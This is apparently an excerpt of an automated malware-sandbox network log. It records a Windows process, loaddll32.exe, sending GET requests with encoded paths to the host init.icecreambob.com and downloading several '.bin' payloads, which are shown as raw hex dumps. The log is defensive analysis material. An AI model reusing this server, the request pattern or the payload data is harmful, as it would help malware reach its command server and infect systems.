                                                          Data Ascii: ^P-vA10oA|d/ {$B?yAD99g^0L83~%O7z{-7?{^BeF8LSdL}2Cm`sK ;>fBQsV+UcegU(An(]'^@i,SZ}g]G!
                                                          Oct 7, 2021 01:32:18.762798071 CEST1611INData Raw: 25 b0 6a 9b f4 a9 d4 01 47 d6 5b 52 11 91 fb 5d 52 68 31 cb 9e 98 68 6f 08 71 61 9d ad af 7c 7d ba 45 b7 ff 87 de 64 12 cc f5 e9 74 53 2a 5f a5 ae 41 86 51 44 c2 ad 66 42 10 3b af 9d a2 fe cb 9a 99 41 f5 d3 fd 0b cc 9a 95 7f 27 03 87 04 ef 41 88
                                                          Data Ascii: %jG[R]Rh1hoqa|}EdtS*_AQDfB;A'AS$!3Pj++lu,2Q,#Me1mKi?TOw\9v<UZ$&V&L4]v3,!NVlL};STy598F%4A/n%2Z5q


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.449777194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:19.242465973 CEST1800OUTGET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.686741114 CEST1802INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203a062c.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ
                                                          Oct 7, 2021 01:32:19.686785936 CEST1803INData Raw: bb 74 00 07 b2 53 48 2b df 48 20 15 1b 25 9a 6b 3d 39 33 46 15 c6 7f 39 4a 6b 31 a8 c6 5b 3d 4b bd f4 ee 5a 70 9e 0b 7f c4 eb 11 34 d4 9d be 62 ef 69 1c 35 2c ae db c5 89 21 81 67 5c fe d2 b6 53 8b 8e 0b e2 50 ce 84 15 8e c3 b9 d4 6f 38 a3 7b 85
                                                          Data Ascii: tSH+H %k=93F9Jk1[=KZp4bi5,!g\SPo8{up}w#"6ZxP%i{:{?u+SnXXk3zhz=+~3Kl=~@qZ:xF6;!fEZ\<FmnJ!:9Rq
                                                          Oct 7, 2021 01:32:19.686824083 CEST1805INData Raw: 45 8c c3 5f c8 f0 ef 84 51 2e 1e 97 72 76 0a ba 21 c6 92 d8 54 08 41 3b e0 7a f4 47 1f bc dc fa 9b a0 66 de 38 7d 71 f8 a0 e3 73 b9 f7 80 80 aa d4 7c 91 17 19 80 d1 b7 34 ae 80 85 bb ff 0d 43 a2 ad 6c 9b c3 7d ad 25 3e fc 49 4b 45 8b 24 9f c2 34
                                                          Data Ascii: E_Q.rv!TA;zGf8}qs|4Cl}%>IKE$4QdCxy*^qZ9c!WfMx]|*ivxNQQgEbY]Y_v2'NHG3E=5ZCxo}^2}77j`YePI&`s0
                                                          Oct 7, 2021 01:32:19.686866045 CEST1806INData Raw: bf ff 9b 51 fb c7 53 ce d6 a3 ff 29 fe fd e7 23 a3 f6 fc 32 2d 9e 44 84 20 1e a0 44 0a 99 fd 65 58 64 8e b1 2b 3d 51 a6 35 29 7f 4e 09 44 74 ed 6d 4b d8 3a 22 a2 0d b9 38 b3 fb ad 55 99 a3 4b e1 28 0b be 85 86 7e b4 57 48 fa 2b b0 3d 65 8f 37 b8
                                                          Data Ascii: QS)#2-D DeXd+=Q5)NDtmK:"8UK(~WH+=e7'd+kmk8CNy0BV?PY]r]PHMMFu`_1+v%zu+QGCEq]WClmN`?R"aFX$=O4v0=cMhNNJF~r9
                                                          Oct 7, 2021 01:32:19.687088013 CEST1807INData Raw: 4e 6b 3c 42 ba 15 91 a5 1e 9b c1 00 1c cc 9d 63 da e9 55 4f 6b 47 d5 b5 59 8d cf 44 ff af a3 5b 09 5b 23 e0 da 0e 4c b9 b8 4b b9 5f be 0f 2b df 19 ea b3 17 f8 86 56 2d b6 bc 9d 8f b6 8e 28 b4 d6 09 88 a5 e1 93 dc 97 7e 41 1c 6b 30 6a e6 ff ed 25
                                                          Data Ascii: Nk<BcUOkGYD[[#LK_+V-(~Ak0j%Z^A<!H;e:+Uv&[6<u^aO`*\lEv*WcD>B\[c6j,C.z^R}C9L@cif~LS[CDdYB,v`)s?^'
                                                          Oct 7, 2021 01:32:19.687247038 CEST1809INData Raw: 80 9d 44 25 2e d3 89 85 b1 48 7d b0 6b db 1f b9 6f 88 47 31 13 e0 8f 0a ca f9 75 2f 97 63 84 9f 79 92 b5 63 68 c6 45 44 d8 8a d2 5e e6 0c 0f e0 df d5 9f e7 5a 34 b0 56 4c a8 34 f7 58 e9 aa b1 f8 08 78 bb 56 d7 6e d8 11 73 c0 cf f6 87 ea 7f db a0
                                                          Data Ascii: D%.H}koG1u/cychED^Z4VL4XxVnsiFqlkqaAOkVIu{$pL-`NG\9YU{D)pPZR\}6X@l%;J"v5?S`b28$S8O gsBBlfd "
                                                          Oct 7, 2021 01:32:19.687869072 CEST1810INData Raw: 6d da a3 6c be 82 e2 72 8b 8b c5 8d 31 41 bb 56 58 56 73 a9 9a b9 b0 1d 3f 49 ef 0f 29 80 87 7b f2 33 69 a7 44 37 eb a4 ee 4c 22 cf 25 8d 09 5b 2a b5 e4 f4 3d ee d9 ec 24 41 90 a7 07 37 11 e1 65 df c4 af 48 f6 a6 cf 26 26 c0 eb b8 46 d6 03 a7 ac
                                                          Data Ascii: mlr1AVXVs?I){3iD7L"%[*=$A7eH&&Fun%-UR!0f76-"_(4Fo\~v;)1YbN)BL8`iqn50&@L{2P=n:#4b$;C
                                                          Oct 7, 2021 01:32:19.688245058 CEST1812INData Raw: e5 78 5f 9f 99 d7 b9 59 7c 00 4a e4 ae 4f bc 9e 22 78 f2 46 f0 7f 1d fe de 31 97 36 bf 93 35 0e 31 15 b0 30 25 9a 25 52 e2 b7 39 cf dd 0c 04 07 16 d3 e9 a2 73 b1 90 b4 6b 8d e2 2f ef 02 da 6c 29 91 df 06 99 4b 75 c9 45 1d 85 b3 bd 63 db af c5 ff
                                                          Data Ascii: x_Y|JO"xF16510%%R9sk/l)KuEcN#[aQM$rFAT_7FRYQf8bErj?rzb'ICq8O{F%N^u,,C>7=Xr7J_5NzP@
                                                          Oct 7, 2021 01:32:19.688307047 CEST1813INData Raw: 55 85 3f 60 f1 a6 c3 6d 62 f9 6d 8a 01 75 c2 a7 63 1b c7 9f 0e 3f d4 da 01 2e 5e 60 c9 ef a0 06 16 6d 2d 2a 1c 0d 0f ec 03 03 8f 0f 82 7a 22 1b 29 8f f8 bb d7 7f dc 6f 03 6d 76 41 84 7b da 41 8d 28 75 be 0c 76 b5 d6 cb 48 a6 44 5b bb 8c 6c 09 b4
                                                          Data Ascii: U?`mbmuc?.^`m-*z")omvA{A(uvHD[lr@<Y,rc5_-tu{&l+hcUn|g:Xm@2zvWG_;&zPv*St.`^_65a ,k|
                                                          Oct 7, 2021 01:32:19.688653946 CEST1814INData Raw: 90 ea 95 5e 8e 8d ab 92 13 f3 99 50 12 90 a6 a8 b4 c6 d9 98 92 a0 f3 f4 19 b1 b4 2d 76 19 41 e3 31 30 16 1a 6f c4 d4 41 de 0e 8c e5 92 b8 7c 64 93 1b 2f 20 dd 03 99 a5 7b 24 e8 42 3f 18 79 c7 c9 d9 a4 41 17 eb 1d a0 44 39 ad 85 e6 93 39 84 67 9c
                                                          Data Ascii: ^P-vA10oA|d/ {$B?yAD99g^0L83~%O7z{-7?{^BeF8LSdL}2Cm`sK ;>fBQsV+UcegU(An(]'^@i,SZ}g]G!
                                                          Oct 7, 2021 01:32:19.743098974 CEST1816INData Raw: 25 b0 6a 9b f4 a9 d4 01 47 d6 5b 52 11 91 fb 5d 52 68 31 cb 9e 98 68 6f 08 71 61 9d ad af 7c 7d ba 45 b7 ff 87 de 64 12 cc f5 e9 74 53 2a 5f a5 ae 41 86 51 44 c2 ad 66 42 10 3b af 9d a2 fe cb 9a 99 41 f5 d3 fd 0b cc 9a 95 7f 27 03 87 04 ef 41 88
                                                          Data Ascii: %jG[R]Rh1hoqa|}EdtS*_AQDfB;A'AS$!3Pj++lu,2Q,#Me1mKi?TOw\9v<UZ$&V&L4]v3,!NVlL};STy598F%4A/n%2Z5q


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.449778194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:19.340179920 CEST1801OUTGET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.811055899 CEST1894INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203bb666.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza
                                                          Oct 7, 2021 01:32:19.811140060 CEST1895INData Raw: 48 57 a9 2f 4c a2 4c 07 a3 1c 0f 34 9e a5 7a 23 91 f3 40 11 49 37 98 44 60 59 20 08 3d 94 df aa 6d 3b 7c f7 f7 89 91 f9 f1 f8 02 a8 c2 7c f4 d7 51 a4 cd 5e d0 e3 0b a4 17 ed 15 e5 93 70 53 b8 3d 71 04 2d 5f 39 37 24 85 22 cf 75 7e 96 87 dd 4f c3
                                                          Data Ascii: HW/LL4z#@I7D`Y =m;||Q^pS=q-_97$"u~OuhhqN N1tt.<n*(cY=`"DAi(%80X\m[bW+AC5*O/QXYb52'hKi:)l,-<P; b7BxXK|
                                                          Oct 7, 2021 01:32:19.811191082 CEST1897INData Raw: f2 80 cf 6d a8 ee f3 d2 ba 7c b3 24 3d 68 9a 82 2a 60 85 2f dc 11 f3 d3 53 ff cf 00 22 25 84 f9 25 54 51 bc 26 8a e6 16 82 c7 02 c2 f9 7c 30 8d 61 26 49 dd 0b 63 d3 f4 93 5e 67 94 0c c9 eb cf ab 72 26 07 fb 74 0e 66 1e f1 ee 28 c6 fc 13 19 4b 97
                                                          Data Ascii: m|$=h*`/S"%%TQ&|0a&Ic^gr&tf(KI#wK%uF>S"P[kD8,{)0S;CYA7r"Jx[Rhz\2Fpw8s,xgv<w.m= FFNjdNT,du$b{V
                                                          Oct 7, 2021 01:32:19.811217070 CEST1898INData Raw: f7 a9 67 36 b4 35 60 67 f6 b3 db 15 02 ca ef 82 02 39 86 36 eb 97 f4 19 b3 df ac 62 79 69 23 ae 4c 1c d9 f8 27 40 b4 ca 71 24 2b 94 ca bd 11 6b f7 10 a9 57 cb 80 17 85 45 f2 c2 97 d6 60 b4 9f da ef 9d 19 ca 58 d9 3f f3 af c7 a0 08 d3 ed f8 a6 ce
                                                          Data Ascii: g65`g96byi#L'@q$+kWE`X?VCI` 0U[U;5;S*7W(I pt*G/-[/B4,(W%HG||8hBuK{^m~o:n\70hGUu!J
                                                          Oct 7, 2021 01:32:19.811242104 CEST1899INData Raw: 1f a2 bb 51 3b 3b fc 03 f3 ac d4 b2 e7 2c 28 a1 18 08 b3 40 1a fb 48 43 76 af 34 5d 1f 25 c1 ed 85 84 e5 2a 1f ca d1 1d 78 84 e8 b3 e4 39 8f c5 cc fd 7f 5c 44 6f d0 96 b3 d9 0a 77 fd bb 0d 18 7c 91 b3 ff a9 e8 20 77 65 62 39 86 d3 d1 13 a1 a1 5e
                                                          Data Ascii: Q;;,(@HCv4]%*x9\Dow| web9^knwi3=*)CN"/.#l$|~0|LV0H..UgMA P29N=w|<7}vBR
                                                          Oct 7, 2021 01:32:19.811264992 CEST1901INData Raw: 72 1f ff f6 60 fd f7 af fb b2 94 3f 3f fe 24 83 55 06 5d d1 16 b2 14 fe e2 a8 f5 b7 f9 fa 35 c2 01 b5 da ed d8 e6 e3 fd 5b f2 04 7c 81 bc 81 8f 4c 4e fe 08 7a d9 e1 b6 f8 58 54 db c0 9d 4d 10 7e 6d ed d4 81 d8 ae 8c 91 d4 5f 2d e0 20 d7 89 6c a9
                                                          Data Ascii: r`??$U]5[|LNzXTM~m_- lg>X!?Q{b~Dz/Zu'.X+&n/ }|E&sa?^EPNyv=Jj{89snvU"VC!36
                                                          Oct 7, 2021 01:32:19.811290026 CEST1902INData Raw: 5f 8e fc e9 8a 59 e6 f4 27 6c f8 76 c5 36 39 7a e2 d8 88 b4 a0 1c bf 59 4e 8e 99 c9 bb 4c 21 b9 be a7 0f 58 db ad ab 31 7d 59 71 00 03 51 64 80 bf 22 d9 ab e8 a6 8c b6 2f 84 a8 b6 16 ab 80 b8 05 dd 47 57 d8 29 65 19 1a d1 a6 f1 77 68 e9 73 4c a9
                                                          Data Ascii: _Y'lv69zYNL!X1}YqQd"/GW)ewhsL"^?9?mvV(d)0Rpm7?'deTy4MlbLuU4h4`-[~m]P^k{':lUQSf/v
                                                          Oct 7, 2021 01:32:19.811311960 CEST1903INData Raw: a1 1d 28 79 3f d3 2e 2b c8 94 cf 20 0a d3 cd 6f 3c 27 bf 06 32 a4 de 26 68 b0 a2 48 df 2e 1c e7 63 5f 3f 81 6b e3 e4 19 64 74 88 18 4b af 22 52 c2 20 22 a5 f2 fb a1 75 4c cd 59 19 04 95 dd 6f e6 4b 5a ce 69 1f f7 3b 78 40 97 50 13 0c 3f 3d f2 1e
                                                          Data Ascii: (y?.+ o<'2&hH.c_?kdtK"R "uLYoKZi;x@P?=(6#+~3~q-^Ke!)F="vM!Ly(BK%SMj;=V+k@*^r4I??StUey#ggZFAc9t&rEI
                                                          Oct 7, 2021 01:32:19.811336994 CEST1905INData Raw: 3f aa 73 11 0d 57 14 b7 16 27 e9 b5 75 1c 37 e0 3d 9f 68 cd d4 5b e3 4a 31 ea 34 d5 4b 4e 34 a2 06 46 ea 52 44 df 5b f3 97 aa 9a 2f 92 4c c6 4e 3b ba f4 38 30 e3 cb 30 12 7e b3 d4 4b 54 6f 34 70 7e 90 94 76 cf 46 44 91 41 c0 d1 f6 42 61 c9 10 b3
                                                          Data Ascii: ?sW'u7=h[J14KN4FRD[/LN;800~KTo4p~vFDABa*cL(]D=A=p(j%v/hkvvKB^<s0:sNDg9e?ddIT}PA %gXr7(/IH[E!EdT]O"
                                                          Oct 7, 2021 01:32:19.824913025 CEST1906INData Raw: 1a 93 14 95 99 66 8e c9 d5 22 0f 0f 14 4f 08 4d 3b 95 ee 45 02 bd c4 96 f0 c3 a3 89 d8 32 21 6a ae 05 b7 1b 73 76 b7 a5 b5 12 e1 d6 bb 59 bb 7a be 71 fa f8 1e 35 4d d3 9c 92 d6 32 df e2 9c b4 24 c1 27 d4 68 b5 c7 e0 93 fe 73 cb 0a 76 72 53 61 4b
                                                          Data Ascii: f"OM;E2!jsvYzq5M2$'hsvrSaKXmcgPlL'9'"zDk"h5IA>!'6Qn =ds5}`VOts;{Mb|b7B?@QKfZbR0H1w.Ao08|*we >6^
                                                          Oct 7, 2021 01:32:19.860569000 CEST1920INData Raw: c4 6b 40 13 06 45 0a 3d 48 54 79 ff 92 84 a6 e6 01 d5 f4 11 74 8f 47 cd db d7 f7 26 22 2c a4 68 a4 29 14 96 6b 20 15 b5 ba 29 2a 95 a0 63 56 67 a6 e9 65 d2 c1 c4 b5 ad 73 3f 8a b5 1e 10 4e 99 43 a8 51 ee d5 aa 8f a8 52 10 fd 44 45 12 79 f5 9e 1f
                                                          Data Ascii: k@E=HTytG&",h)k )*cVges?NCQRDEy$,7:O Pq+U'/s*\|v$cP7xg.eH$%B2%bj]qZUEGzCEF@9J18GaapL9}NPD^az?0?P:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.449779194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:20.827048063 CEST2263OUTGET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.292851925 CEST2265INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e32053f1dd.bin"
